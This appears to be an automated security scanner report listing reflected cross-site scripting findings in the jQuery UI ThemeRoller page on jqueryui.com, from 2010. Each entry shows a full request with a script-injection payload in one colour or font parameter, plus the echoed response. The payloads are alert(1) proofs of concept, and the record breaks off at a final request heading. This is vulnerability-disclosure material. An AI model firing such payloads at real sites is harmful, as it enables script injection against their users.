GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555605a3"><script>alert(1)</script>449b4443c2d&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:27:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0b2e"><script>alert(1)</script>ab77fccbd26 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203ec0b2e"><script>alert(1)</script>ab77fccbd26&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:31:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8678d"><script>alert(1)</script>afc432a7bb6 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=0101018678d"><script>alert(1)</script>afc432a7bb6&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:25:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9fd"><script>alert(1)</script>f5ecfc6aec0 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636cc9fd"><script>alert(1)</script>f5ecfc6aec0&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:30:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ef8"><script>alert(1)</script>5eda88eabce was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121b4ef8"><script>alert(1)</script>5eda88eabce&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:27:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa395"><script>alert(1)</script>0fa87626802 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-seriffa395"><script>alert(1)</script>0fa87626802&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:23:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 286af"><script>alert(1)</script>fa88153198a was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px286af"><script>alert(1)</script>fa88153198a&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:24:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e8b"><script>alert(1)</script>2e205dee113 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal26e8b"><script>alert(1)</script>2e205dee113&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:23:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120034
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525e3"><script>alert(1)</script>e1a9bff29ab was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545525e3"><script>alert(1)</script>e1a9bff29ab&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:29:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2f25"><script>alert(1)</script>177d857462b was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222f2f25"><script>alert(1)</script>177d857462b&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:26:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48bbf"><script>alert(1)</script>65e5ab4225b was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888848bbf"><script>alert(1)</script>65e5ab4225b&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:27:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adb4f"><script>alert(1)</script>981f4e08c10 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203eadb4f"><script>alert(1)</script>981f4e08c10&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:31:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f47"><script>alert(1)</script>50caeb8292e was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645a0f47"><script>alert(1)</script>50caeb8292e&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:25:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50110"><script>alert(1)</script>fa031faa443 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
